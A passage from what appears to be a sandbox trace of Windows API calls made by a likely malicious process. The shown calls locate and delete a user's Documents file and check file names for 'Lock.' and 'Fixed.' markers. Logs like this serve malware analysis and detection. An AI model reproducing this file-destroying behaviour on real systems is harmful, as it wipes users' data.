hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0260.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0260.998] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.998] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0261.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/8vMS.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx", lpFilePart=0x8bedfc*="8vMS.docx") returned 0x31 [0261.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0261.000] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8vms.docx")) returned 0x20 [0261.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb5a550, ftCreationTime.dwHighDateTime=0x1d4b9e4, ftLastAccessTime.dwLowDateTime=0x51c1c680, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0x51c1c680, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0xfd98, dwReserved0=0x1a4d, dwReserved1=0x4, cFileName="8vMS.docx", cAlternateFileName="8VMS~1.DOC")) returned 0xaa58a0 [0261.000] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8vms.docx")) returned 1 [0261.003] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb5a550, ftCreationTime.dwHighDateTime=0x1d4b9e4, ftLastAccessTime.dwLowDateTime=0x51c1c680, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0x51c1c680, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0xfd98, dwReserved0=0x1a4d, dwReserved1=0x4, cFileName="8vMS.docx", cAlternateFileName="8VMS~1.DOC")) returned 0 [0261.003] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.003] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0261.004] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.005] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0261.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/8vMS.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx", lpFilePart=0x8bf658*="8vMS.docx") returned 0x31 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0261.007] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8vMS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8vms.docx")) returned 0xffffffff [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0261.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B1NB4QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NB4QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NB4QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B4QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QkFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFt.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ft.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B1NB4QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NB4QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NB4QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B4QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QkFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFt.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ft.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.010] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0261.010] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0261.010] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.010] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0261.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0261.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.011] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0261.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 